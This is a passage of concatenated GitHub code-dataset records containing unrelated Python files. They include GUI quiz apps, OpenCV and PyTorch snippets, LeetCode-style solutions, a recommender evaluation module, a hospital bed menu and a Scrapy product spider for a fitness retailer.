self.schedule_table.insert(parent=\"\", index=\"end\", iid=counter, text=\"\", values=(f\"{class_code}\", f\"{subject}\", f\"{time_stamp}\"))\n counter += 1\n \n if len(self.class_dict) == 0:\n self.schedule_table.insert(parent=\"\", index=\"end\", iid=counter, text=\"\", values=(\"\", \"Please Enter Data to Continue\", \"\"))\n\n # --------------- back button\n back_button = Button(manage_class_frame, text=\"Back\", command=self.to_menu, width=14, height=1)\n back_button.configure(background=BLACK, fg=WHITE, font=(FONT, 12, \"bold\"))\n back_button.grid(column=0, row=3, pady=20, sticky=\"W\")\n\n # --------------- add class button\n add_class_button = Button(manage_class_frame, text=\"Add New\", command=self.add_class_schedule, width=14, height=1)\n add_class_button.configure(background=PURPLE, fg=WHITE, font=(FONT, 12, \"bold\"))\n add_class_button.grid(column=1, row=3, pady=20, sticky=\"E\")","repo_name":"jptriciaestella/face_card","sub_path":"ui/manage_class.py","file_name":"manage_class.py","file_ext":"py","file_size_in_byte":11728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8700768033","text":"#Coding:utf-8\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QLabel, QLineEdit, QPushButton\nfrom PyQt5.QtGui import QFont, QColor\nimport sys\nfrom random import choice\n\n\nclass MW(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setFixedSize(800, 600)\n # то, какие коэфециенты в шаблоне для рекурсии\n # [+-1, т.е. больше числа или меньше, когда есть рекурсия; чему кратно при проверке на рекурсию; чило, относительно которого всё происходит; слогаемое при нерекурсии; коэфициент при n^2 в формуле с рекурсией;\n # 5) коэфициент при n в формуле с рекурсией; слогаемое в формуле с рекурсией; коэфициент при рекурсии; слогаемое в рекурсии]\n self.variables = [1, 1, 10, 0, 0,\n 1, 1, 1, 1]\n # второй исход с рекурсивной формулой\n # [коэфициент при n^2 в формуле с рекурсией; коэфициент при n в формуле с рекурсией; слогаемое в формуле с рекурсией; коэфициент при рекурсии; слогаемое в рекурсии]\n self.variables2 = [0, 1, 1, 1, 1]\n self.whatcall = 10 # от чего вызываем\n self.answer = 0 # ответ на задачу\n # кнопка обновления\n self.updatebtn = QPushButton(self)\n self.updatebtn.clicked.connect(self.update)\n self.updatebtn.resize(50, 50)\n self.updatebtn.move(750, 550)\n self.updatebtn.setFont(QFont('Arial', 12))\n self.updatebtn.setText('ОБН')\n # лабел \"ответ\"\n self.anslab = QLabel(self)\n self.anslab.resize(150, 50)\n self.anslab.move(0, 550)\n self.anslab.setFont(QFont('Arial', 12))\n self.anslab.setText('ОТВЕТ:')\n # поле для ответа\n self.ansedit = QLineEdit(self)\n self.ansedit.resize(300, 50)\n self.ansedit.move(155, 550)\n self.ansedit.setFont(QFont('Arial', 12))\n # правильный ответ/нет лабел\n self.oklab = QLabel(self)\n self.oklab.resize(50, 50)\n self.oklab.move(460, 550)\n self.oklab.setFont(QFont('Arial', 12))\n self.oklab.setText('ДА')\n self.oklab.hide()\n # кнопка для проверки\n self.checkbtn = QPushButton(self)\n self.checkbtn.clicked.connect(self.checkAns)\n self.checkbtn.resize(150, 50)\n self.checkbtn.move(510, 550)\n self.checkbtn.setFont(QFont('Arial', 12))\n self.checkbtn.setText('ПРОВЕРИТЬ')\n # виджеты с условием на экране\n # [условие с =; возврвт с рекурсией; условие без =; возврат без рекурсии]\n self.tasklabs = []\n for i in range(7):\n self.tasklabs.append(QLabel(self))\n self.tasklabs[-1].resize(800, 50)\n self.tasklabs[-1].move(0, i * 55)\n self.tasklabs[-1].setFont(QFont('Ariel', 12))\n self.tasklabs[-1].show()\n \n def update(self):\n '''обновление задачи'''\n self.oklab.hide() # скрытие лабела\n # рандомизация коэфициентов\n self.variables = [choice([-1, 1]), choice([1, 2, 3]), choice(range(1, 25)), choice(range(-5, 5)), choice(range(-5, 5)),\n choice(range(-10, 5)), choice(range(-20, 20)), choice(list(range(-5, 0)) + list(range(1, 5))), choice(range(1, 5))]\n self.variables2 = [choice(range(-5, 5)), choice(range(-10, 5)), choice(range(-20, 20)), choice(list(range(-5, 0)) + list(range(1, 5))), choice(range(1, 5))]\n self.whatcall = choice(range(10, 500)) # рандомизация аргумента\n self.answer = self.getRec(self.whatcall)\n # заполняем лабел 0 (заголовок нерекурсии)\n s = 'При n <= ' + str(self.variables[2]) + ':' # просто строка для промежуточного хранения текста\n if self.variables[0] == -1:\n s = s.replace('<', '>')\n self.tasklabs[0].setText(s)\n # заполняем лабел 1 (формула нерекурсии)\n s = 'F(n) = n '\n if self.variables[3] < 0:\n s = s + '- ' + str(-1 * self.variables[3])\n elif self.variables[3] > 0:\n s = s + '+ ' + str(self.variables[3])\n self.tasklabs[1].setText(s)\n # заполняем лабел 2 (заголовок рекурсии)\n s = 'При n > ' + str(self.variables[2])\n if self.variables[0] == -1:\n s = s.replace('>', '<')\n if self.variables[1] != 1:\n s = s + ' и кратно ' + str(self.variables[1])\n s = s + ':'\n self.tasklabs[2].setText(s)\n # заполняем лабел 3 (формула рекурсии)\n s = 'F(n) = '\n if self.variables[7] == 1: # перед рекурсией\n s = s + 'F(n )'\n else:\n s = s + str(self.variables[7]) + 'F(n '\n if self.variables[0] == -1: # слогаемое в рекурсии\n s = s + '+ ' + str(self.variables[8]) + ') '\n else:\n s = s + '- ' + str(self.variables[8]) + ') '\n if self.variables[4] == 1: # n^2\n s = s + '+ ' + 'n^2 '\n elif self.variables[4] < 0:\n s = s + str(self.variables[4]) + 'n^2 '\n elif self.variables[4] > 0:\n s = s + '+' + str(self.variables[4]) + 'n^2 '\n if self.variables[5] == 1: # n\n s = s + '+ ' + 'n'\n elif self.variables[5] < 0:\n s = s + str(self.variables[5]) + 'n '\n elif self.variables[5] > 0:\n s = s + '+' + str(self.variables[5]) + 'n '\n if self.variables[6] < 0: # слогаемое\n s = s + str(self.variables[6])\n elif self.variables[6] > 0:\n s = s + '+' + str(self.variables[6])\n self.tasklabs[3].setText(s) # запись на лабел\n # лабелы 4 и 5 (доп строки для кратности)\n if self.variables[1] == 1:\n self.tasklabs[4].setText('Чему равно F(' + str(self.whatcall) + ')?')\n self.tasklabs[5].setText('')\n self.tasklabs[6].setText('')\n else:\n self.tasklabs[4].setText('Иначе:')\n s = 'F(n) = '\n if self.variables2[3] == 1: # перед рекурсией\n s = s + 'F(n )'\n else:\n s = s + str(self.variables2[3]) + 'F(n '\n if self.variables[0] == -1: # слогаемое в рекурсии\n s = s + '+ ' + str(self.variables2[4]) + ') '\n else:\n s = s + '- ' + str(self.variables2[4]) + ') '\n if self.variables2[0] == 1: # n^2\n s = s + '+ ' + 'n^2 '\n elif self.variables2[0] < 0:\n s = s + str(self.variables2[0]) + 'n^2 '\n elif self.variables2[0] > 0:\n s = s + '+' + str(self.variables2[0]) + 'n^2 '\n if self.variables2[1] == 1: # n\n s = s + '+ ' + 'n'\n elif self.variables2[0] < 0:\n s = s + str(self.variables2[0]) + 'n '\n elif self.variables2[0] > 0:\n s = s + '+' + str(self.variables2[0]) + 'n '\n if self.variables2[2] < 0: # слогаемое\n s = s + str(self.variables2[2])\n elif self.variables2[2] > 0:\n s = s + '+' + str(self.variables2[2])\n self.tasklabs[5].setText(s) # запись на лабел\n self.tasklabs[6].setText('Чему равно F(' + str(self.whatcall) + ')?')\n\n \n def getRec(self, whatcall):\n '''возвращает, что должно быть в результате рекурсии'''\n if self.variables[0] == 1 and whatcall <= self.variables[2] or\\\n self.variables[0] == -1 and whatcall >= self.variables[2]: # возвращается не рекурсия\n return whatcall + self.variables[3]\n elif (self.variables[0] == 1 and whatcall > self.variables[2] or\\\n self.variables[0] == -1 and whatcall < self.variables[2]) and whatcall % self.variables[1] == 0: # возвращается рекурсия при кратном\n return self.variables[7] * self.getRec(whatcall - self.variables[0] * self.variables[8]) + self.variables[4] * whatcall ** 2 +\\\n whatcall * self.variables[5] + self.variables[6]\n else: # возврвщает при некратном\n return self.variables2[3] * self.getRec(whatcall - self.variables[0] * self.variables2[4]) + self.variables2[0] * whatcall ** 2 +\\\n whatcall * self.variables2[1] + self.variables[2]\n\n def checkAns(self):\n try:\n ans = int(self.ansedit.text())\n self.oklab.show()\n if ans == self.answer:\n self.oklab.setText('

    ДА

    ')\n else:\n self.oklab.setText('

    НЕТ

    ')\n except:\n self.oklab.setText('

    ERR,

    ')\n print(self.answer)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n mw = MW()\n mw.show()\n sys.exit(app.exec_())\n ","repo_name":"Helegerd/recursia","sub_path":"recursia.py","file_name":"recursia.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13725327482","text":"import cv2 \nimport numpy as np\n\n# function to draw\ncount = 0\nx1 = 0\ny1 = 0\nx2 = 0\ny2 = 0\ndef draw(event, x, y, flags, param):\n global count, x1, y1, x2, y2\n if (event == cv2.EVENT_LBUTTONDOWN) and count == 0:\n x1 = x\n y1 = y\n count+=1\n elif (event == cv2.EVENT_LBUTTONDOWN) and count == 1:\n x2 = x\n y2 = y\n count = 0\n cv2.rectangle(img, pt1=(x1, y1), pt2=(x2, y2), color=(0,3,0), thickness=1)\n# else:\n# cv2.rectangle(img , pt1=(0,500), pt2=(500, 0), color=(0,0,0), thickness=-1)\n \n# connect to Callback function to draw\ncv2.namedWindow(winname = \"Title_bar\")\ncv2.setMouseCallback('Title_bar', draw)\n\n# image to show\n\nimg = np.zeros([500, 500, 3])\n\n# window operation\n\n\n# if we use \"and\" instead of \"&\" then the operation will not work because here we are doing bitwise and between \"cv2.waitKey(1)\"and\n# binary of 0xFF and checking whether the value of \"(cv2.waitKey(1) & 0xFF)\" is equal to ordinal value of q or say numeric value of \"q\"\n\n# https://stackoverflow.com/questions/35372700/whats-0xff-for-in-cv2-waitkey1\n# https://stackoverflow.com/questions/53357877/usage-of-ordq-and-0xff?rq=1\n\nwhile True:\n cv2.imshow('Title_bar', img)\n \n if (cv2.waitKey(1) & 0xFF) == ord('q'):\n break\n \ncv2.destroyAllWindows()","repo_name":"harshvardhan-anand/Artificial-Intelligence-Notes","sub_path":"ComputerVision/Notes/RectangleDrawWithMouse.py","file_name":"RectangleDrawWithMouse.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25849316364","text":"import torch\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torchvision.models import resnet18\nimport matplotlib.pyplot as plt\n\nmodel = resnet18(num_classes=2)\noptimizer = optim.SGD(params=model.parameters(), lr=0.05)\n\n# lr_scheduler.StepLR()\n# Assuming optimizer uses lr = 0.05 for all groups\n# lr = 0.05 if epoch < 30\n# lr = 0.005 if 30 <= epoch < 60\n# lr = 0.0005 if 60 <= epoch < 90\n\nscheduler = lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.1)\nplt.figure()\nx = list(range(100))\ny = []\nfor epoch in range(100):\n scheduler.step()\n lr = scheduler.get_lr()\n # print(epoch, scheduler.get_lr()[0]) # get_lr()\n y.append(scheduler.get_lr()[0])\nplt.plot(x, y)\nplt.savefig('lr_step.png')","repo_name":"PresageBoat/LRCurve","sub_path":"lr_curve/lr_step_curve.py","file_name":"lr_step_curve.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"43430623747","text":"import time\nfrom triangle import classify_triangle\n\n# examples taken from test_triangle.py\ntriangles = [\n # invalid\n (1, 2, 9), (1, 9, 2), (2, 1, 9), (2, 9, 1), (9, 1, 2), (9, 2, 1),\n (1, 1, -1), (1, -1, 1), (-1, 1, 1),\n # equilateral\n (1, 1, 1), (100, 100, 100), (99, 99, 99),\n # isosceles\n (100, 90, 90), (90, 100, 90), (90, 90, 100), (2, 2, 3),\n # scalene\n (5, 4, 3), (5, 3, 4), (4, 5, 3), (4, 3, 5), (3, 5, 4),\n]\n\n\nif __name__ == '__main__':\n # we don't really care about the output (we know the function work, from the test suite)\n # we just want to have something on which to measure running time\n\n for _ in range(3):\n for triangle in triangles:\n classify_triangle(*triangle)\n","repo_name":"bloa/magpie","sub_path":"examples/code/triangle-py_slow/run_triangle.py","file_name":"run_triangle.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"16768992632","text":"#建立评价指标,评价模型\nimport numpy as np\nfrom users.recommend.myRecommend import *\n\n#召回率描述有多少比例的用户—物品评分记录包含在最终的推荐列表中,而准确率描述最终的推荐列表中有多少比例是发生过的用户—物品评分记录\n\ndef recall(trainset,testset,N,recommend,movie_matrix,user_matrix):\n all=0\n rec_list=0\n for user,movie in trainset.items():\n if user_matrix[user] in testset.keys():\n test_u=testset[user_matrix[user]]\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n if item in test_u:\n rec_list+=1\n all+=len(test_u)\n return rec_list/all\n\ndef precision(trainset,testset,N,recommend,movie_matrix,user_matrix):\n all=0\n rec_list=0\n # rs=recommendSys()\n for user,movie in trainset.items():\n if user_matrix[user] in testset.keys():\n test_u=testset[user_matrix[user]]\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n if item in test_u:\n rec_list+=1\n all+=N\n return rec_list/all\n\n\n#覆盖率表示最终的推荐列表中包含多大比例的物品\ndef coverage(trainset,testset,N,recommend,movie_matrix,user_matrix):\n allitems=set()\n coverageitems=set()\n for user,movie in trainset.items():\n for item in trainset[user].keys():\n allitems.add(item)\n\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n coverageitems.add(item)\n return len(coverageitems)/len(coverageitems)\n\n\n#新颖度:用推荐列表中物品的平均流行度度量推荐结果的新颖度,如果推荐出的物品都很热门,说明推荐的新颖度较低,否则说明推荐结果比较新颖。\ndef popularity(trainset,testset,N,recommend,movie_matrix,user_matrix):\n #得到流行表\n popularitems=dict()\n for user,movie in trainset.items():\n for item in movie.keys():\n if item not in popularitems:\n popularitems[item]=0\n popularitems[item]+=1\n res=0\n n=0\n for user,movie in trainset.items():\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n res+=np.log(1+popularitems[item])\n n+=1\n\n return res/n\n\n","repo_name":"iambajie/movie-recommend","sub_path":"users/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13172919839","text":"# 给定一个二叉树,它的每个结点都存放一个 0-9 的数字,每条从根到叶子节点的路径都代表一个数字。\n#\n# 例如,从根到叶子节点路径 1->2->3 代表数字 123。 \n#\n# 计算从根到叶子节点生成的所有数字之和。 \n#\n# 说明: 叶子节点是指没有子节点的节点。 \n#\n# 示例 1: \n#\n# 输入: [1,2,3]\n# 1\n# / \\\n# 2 3\n# 输出: 25\n# 解释:\n# 从根到叶子节点路径 1->2 代表数字 12.\n# 从根到叶子节点路径 1->3 代表数字 13.\n# 因此,数字总和 = 12 + 13 = 25.\n#\n# 示例 2: \n#\n# 输入: [4,9,0,5,1]\n# 4\n# / \\\n# 9 0\n#  / \\\n# 5 1\n# 输出: 1026\n# 解释:\n# 从根到叶子节点路径 4->9->5 代表数字 495.\n# 从根到叶子节点路径 4->9->1 代表数字 491.\n# 从根到叶子节点路径 4->0 代表数字 40.\n# 因此,数字总和 = 495 + 491 + 40 = 1026.\n#\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Node:\n def __init__(self, item):\n self.item = item\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def __init__(self):\n self.root = None\n\n def add(self, item):\n node = Node(item)\n if self.root is None:\n self.root = node\n else:\n q = [self.root]\n\n while True:\n pop_node = q.pop(0)\n if pop_node.left is None:\n pop_node.left = node\n return\n elif pop_node.right is None:\n pop_node.right = node\n return\n else:\n q.append(pop_node.left)\n q.append(pop_node.right)\n\n def sumNumbers(self, root):\n \"\"\"\n :type root: TreeNode\n :type sum: int\n :rtype: List[List[int]]\n \"\"\"\n res = []\n self.auxPathSum(root, [], res)\n\n return sum(res)\n\n def auxPathSum(self, root, cur_list, cur_lists):\n if not root:\n return\n if not root.left and not root.right:\n # cur_lists.append(cur_list + [root.item])\n cur_lists.append(int(''.join(str(i) for i in cur_list + [root.item])))\n return\n if root.left:\n self.auxPathSum(root.left, cur_list + [root.item], cur_lists)\n if root.right:\n self.auxPathSum(root.right, cur_list + [root.item], cur_lists)\n\n\nt = Solution()\nfor i in range(1, 4):\n t.add(i)\nprint('遍历:', t.sumNumbers(t.root))\n","repo_name":"wellqin/USTC","sub_path":"leetcode/editor/cn/[129]求根到叶子节点数字之和.py","file_name":"[129]求根到叶子节点数字之和.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"34118032047","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tqdm\nimport matplotlib.pyplot as pl\n\n\nmnist = input_data.read_data_sets('tmp/mnist_data', one_hot=True)\n\nx_train, y_train = mnist.train.images, mnist.train.labels\n\nx = tf.placeholder(tf.float32, shape=[None, 784], name='x_place')\ny = tf.placeholder(tf.float32, shape=[None, 10], name='y_place')\n\n\nnn = tf.layers.conv2d(\n inputs=tf.reshape(x, shape=[-1, 28, 28, 1]),\n filters=32,\n kernel_size=(5, 5),\n padding='same',\n activation=tf.nn.relu\n)\n\nnn = tf.layers.max_pooling2d(\n inputs=nn,\n pool_size=(2, 2),\n strides=2,\n padding='same'\n)\n\nnn = tf.layers.conv2d(\n inputs=nn,\n filters=64,\n kernel_size=(5, 5),\n padding='same',\n activation=tf.nn.relu\n)\n\nnn = tf.layers.max_pooling2d(\n inputs=nn,\n pool_size=(2, 2),\n strides=2,\n padding='same'\n)\n\npool_dense = tf.layers.dense(tf.reshape(nn, [-1, 7 * 7 * 64]), units=1024, activation=tf.nn.relu)\nres = tf.layers.dense(pool_dense, units=10, activation=tf.nn.sigmoid)\n\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=res), name='Loss')\nprediction = tf.argmax(res, axis=1)\n\noptimizer = tf.train.GradientDescentOptimizer(0.03).minimize(loss)\n\nepochs = 1200\nerrors = []\npred_error = []\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for i in tqdm.tqdm(range(epochs)):\n batch = mnist.train.next_batch(8)\n _, err = sess.run([optimizer, loss], feed_dict={x: batch[0].reshape(8, 784),\n y: batch[1].reshape(8, 10)})\n errors.append(err)\n\n v = mnist.test.next_batch(1)\n pl.imshow(v[0].reshape(28, 28))\n pl.imshow(sess.run(nn, feed_dict={x: v[0].reshape(1, 784)}).reshape(56, 56))\n print()\n print(f\"Pred: {sess.run(prediction, feed_dict={x: v[0].reshape(1, 784)})}\")\n print(f\"Real: {v[1]}\")\n\n# pl.plot(errors)\npl.show()","repo_name":"MikhailKravets/tf","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6519433490","text":"from modelo import actualizarCama, actualizarPaciente, actualizarServicio, camasVacias, eliminarPaciente, ingresarPaciente, insertarPaciente, readCamas, readPacientes, readServicio\n\nseleccion2=0\nclass Menu:\n def __init__(self,*arg):\n self.opciones=arg\n def __str__(self) -> str:\n texto=\"seleccione una opcion\"\n for i in range(len(self.opciones)):\n texto+=f\"\\n{i+1} - {self.opciones[i]}\"\n return texto+\"\\n\"\n\n \ndef wrapCrearPaciente ():\n insertarPaciente(input(\"Inserte el nombre\\n\"), input(\"Inserte RUT del paciente\\n\"),input(\"Ingrese la fecha de nacimiento\\n\"))\n print(\"Paciente creado con èxito\")\n\ndef wrapEliminarPaciente ():\n eliminarPaciente(input(\"Nombre del paciente\\n\"))\n print(\"Paciente eliminado con èxito\")\n\ndef wrapEditarPaciente ():\n actualizarPaciente(input(\"Ingrese el nombre del paciente\\n\"), input(\"Ingrese nombre nuevo\"))\n\ndef wrapActualizarCama ():\n actualizarCama(input(\"Ingrese le nombre de la cama\\n\"), input(\"Ingrese el nuevo nombre de la cama\\n\"))\ndef wrapActualizarServicio ():\n actualizarServicio(input(\"Ingrese el nombre del servicio\\n\", input(\"Ingrese el nuevo nombre del servicio\\n\")))\n\ndef wrapIngresarPaciente ():\n ingresarPaciente(input(\"Nombre del paciente\\n\"), input(\"Nombre de la cama\\n\"), input (\"Fecha de inicio\"), input(\"Fecha final\"))\n\n\ndef menuInput (menu):\n \"\"\"\n Descripción de la función\n \"\"\" \n seleccion2 = input(menu)\n menuprincipal[int(seleccion)-1][int(seleccion2)]()\n \nmenuprincipal=[\n [lambda : menuInput(Menu(\"Crear\", \"Editar\",\"Listar\",\"Eliminar\")),\n wrapCrearPaciente,\n wrapEditarPaciente,\n readPacientes,\n wrapEliminarPaciente\n ],\n [lambda : menuInput(Menu(\"Consultar cama\", \"Editar cama\", \"Consultar servicios\", \"Editar servicios\")),\n readCamas,\n wrapActualizarCama,\n readServicio,\n wrapActualizarServicio,\n\n ],\n [lambda : menuInput(Menu(\"Ingresar paciente\", \"Consultar camas disponibles\")),\n wrapIngresarPaciente,\n camasVacias,\n ]\n]\nseleccion=input(Menu(\"Pacientes\",\"Mantenedores\",\"Gestiòn de camas\"))\n\nmenuprincipal[int(seleccion)-1][int(seleccion2)]()","repo_name":"Shadowrunner11/TrabajoIgnacio","sub_path":"vista.py","file_name":"vista.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6017952931","text":"from src.models.head import Head\nfrom src.models.loss import OneNetLoss\nimport torch\nfrom src.models.object_detection.matcher import MinCostMatcher\nfrom src.nn.fpn import SimpleFPN\nfrom src.nn.vit import ViT\nfrom einops import rearrange\nfrom src.nn.adapters import ViTAdapterForNeck\nfrom src.models.object_detection.yoto import YOTOForObjectDetection\n\nbackbone = ViTAdapterForNeck(ViT(224, patch_size=16, width=768, layers=4, heads=8, output_dim=512))\nfpn = SimpleFPN(in_channels=768)\nhead = Head(256, channels=256, num_classes=2)\ncriterion = OneNetLoss(num_classes=2, matcher=MinCostMatcher())\n\n\nyoto = YOTOForObjectDetection(backbone, fpn, head)\npixel_values = torch.randn((2, 3, 224, 224))\nouts = yoto(pixel_values)\n\nclass_labels = torch.tensor(\n [\n [1, 0],\n [0, 0],\n ]\n)\nboxes_labels = torch.tensor(\n [\n [\n [0.1, 0.1, 0.3, 0.3],\n [0.2, 0.2, 0.4, 0.4],\n ],\n [[0.1, 0.1, 0.3, 0.3], [0, 0, 0, 0]], # pad\n ]\n)\nmask_labels = torch.tensor([[1, 1], [1, 0]], dtype=torch.bool)\nprint(class_labels.shape, boxes_labels.shape)\n\nfeatures = backbone(pixel_values)\nprint(features[0].shape, print(len(features)))\npyramids = fpn(features)\nouts = head(pyramids)\nlosses = criterion(*outs, class_labels, boxes_labels, torch.tensor([640]), mask_labels)\n\nprint(losses)\n","repo_name":"FrancescoSaverioZuppichini/detector","sub_path":"playgrounds/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"38759075509","text":"\"\"\"\nYou are given two positive numbers A and B. You need to find the maximum valued integer X such that:\nX divides A i.e. A % X = 0\nX and B are co-prime i.e. gcd(X, B) = 1\nFor example,\nA = 30\nB = 12\nWe return\nX = 5\n\"\"\"\n\n\n# We know A is the greatest number dividing A. So if A and B are coprime, we can return the value of X to be A.\n# Else, we can try to remove the common factors of A and B from A.\n# We can try to remove the common factors of A and B from A by finding the greatest common divisor\n# (gcd) of A and B and dividing A with that gcd.\n# Mathematically, A = A / gcd(A, B) —— STEP1\n# Now, we repeat STEP1 till we get gcd(A, B) = 1.\n# Atlast, we return X = A\n\nclass Solution:\n # @param A : integer\n # @param B : integer\n # @return an integer\n def cpFact(self, A, B):\n while True:\n A1 = A\n B1 = B\n # Find gcd\n while B1 > 0:\n A1, B1 = B1, A1 % B1\n if A1 == 1:\n return A\n A = A // A1\n return A\n","repo_name":"iamrishap/PythonBits","sub_path":"InterviewBits/math/largest-coprime-divisor.py","file_name":"largest-coprime-divisor.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20542812547","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCustomer: Powerhouse Fitness\nWebsite: http://www.fitness-superstore.co.uk\nExtract all products on site, including product options\n\nTicket link: https://www.assembla.com/spaces/competitormonitor/tickets/4584-powerhouse-fitness-|-superstore-|-new-spider/details#\n\n\"\"\"\n\nimport re\n\nfrom datetime import datetime\nfrom scrapy.spider import BaseSpider\nfrom scrapy.http import Request\nfrom copy import deepcopy\n\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.utils.url import urljoin_rfc\nfrom product_spiders.items import (Product, ProductLoaderWithNameStrip as ProductLoader)\nfrom scrapy.contrib.loader.processor import MapCompose, Join, TakeFirst, Identity\nfrom scrapy.contrib.loader import XPathItemLoader\nfrom scrapy.utils.markup import remove_entities\nfrom product_spiders.utils import extract_price\nimport logging\n\n\nclass ArgosCoUKKeterSpider(BaseSpider):\n name = 'powerhouse_fitness-fitness-superstore.co.uk'\n allowed_domains = ['fitness-superstore.co.uk']\n start_urls = ['http://www.fitness-superstore.co.uk/']\n \n custom_settings = {'COOKIES_ENABLED': False}\n\n def parse(self, response):\n categories = response.xpath('//ul[@id=\"nav\"]//a/@href').extract()\n for url in categories:\n yield Request(response.urljoin(url))\n\n sub_categories = response.xpath('//div[contains(@class, \"sub-cat-block\")]/a/@href').extract()\n for url in sub_categories:\n yield Request(response.urljoin(url))\n\n pages = response.xpath('//div[@class=\"pages\"]//li/a/@href').extract()\n for url in pages:\n yield Request(response.urljoin(url))\n\n products = response.xpath('//div[@class=\"product-item__name\"]//a/@href').extract()\n if products:\n category_names = response.xpath('//div[@class=\"breadcrumbs\"]//li/a/text()').extract()\n category_names += response.xpath('//div[@class=\"breadcrumbs\"]//li/strong/text()').extract()\n category_names = ' > '.join(category_names[1:])\n for url in products:\n yield Request(response.urljoin(url), callback=self.parse_product, meta={'category': category_names})\n\n identifier = response.xpath('//input[@id=\"entity_id\"]/@value').extract()\n if identifier:\n for product in self.parse_product(response):\n yield product\n\n def parse_product(self, response):\n url = response.url\n\n l = ProductLoader(item=Product(), response=response)\n\n name = response.xpath('//span[@itemprop=\"name\"]/text()').extract()\n try:\n name = name[0].strip()\n except IndexError:\n retry = response.meta.get('retry', 0)\n if retry <= 3:\n yield Request(response.url, dont_filter=True, callback=self.parse_product, meta={'retry': retry + 1})\n\n l.add_value('name', name)\n\n price = response.xpath('//p[@class=\"special-price\"]/span[@class=\"price\"]/text()').extract()\n if price:\n price = price[0]\n else:\n price = response.xpath('//span[@class=\"regular-price\"]/span[@class=\"price\"]/text()').extract()\n if price:\n price = price[0]\n l.add_value('price', price)\n\n sku = response.xpath('//div[@class=\"product-shop--sku\"]/h4/span/text()').extract()\n l.add_value('sku', sku[0])\n \n identifier = response.css('div.nosto_product span.product_id::text').extract() or response.xpath('//input[@id=\"entity_id\"]/@value').extract()\n l.add_value('identifier', identifier[0])\n\n l.add_value('category', response.meta.get('category', ''))\n\n image_url = response.xpath('//span[@class=\"image_url\"]/text()').extract()\n l.add_value('image_url', image_url)\n l.add_value('url', url)\n l.add_xpath('brand', '//span[@class=\"brand\"]/text()')\n \n out_of_stock = response.xpath('//div[contains(@class, \"availability-box\")]/p[contains(@class, \"out-of-stock\")]')\n if out_of_stock:\n l.add_value('stock', 0)\n\n item = l.load_item()\n\n options = response.xpath('//table[@id=\"super-product-table\"]/tbody/tr')\n if options:\n for option in options:\n option_item = deepcopy(item)\n option_item['name'] = option.xpath('td[1]/text()').extract()[0]\n price = option.xpath('td//span[@class=\"price\"]/text()').extract()\n price = extract_price(price[0]) if price else 0\n option_item['price'] = price\n identifier = option.xpath('td//input/@name').re('\\[(.*)\\]')\n if not identifier:\n identifier = option.xpath('td//span/@id').re('product-price-(.*)')\n option_item['stock'] = 0\n\n option_item['identifier'] += '-' + identifier[0]\n yield option_item\n else:\n yield item\n\n\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/powerhouse_fitness/fitness_superstore.py","file_name":"fitness_superstore.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30129716817","text":"\"\"\"\r\n\n\nReplace the numbers in a string with their binary form.\n\n### Examples\n\n replace_nums(\"I have 2 sheep.\") ➞ \"I have 10 sheep.\"\n \n replace_nums(\"My father was born in 1974.10.25.\") ➞ \"My father was born in 11110110110.1010.11001.\"\n \n replace_nums(\"10hell76o4 boi\") ➞ \"1010hell1001100o100 boi\"\n\n### Notes\n\n * There are possibly two or more numbers in a single word (I do not recommend splitting the text at spaces, it surely won't help).\n * Anything separates two numbers, even spaces 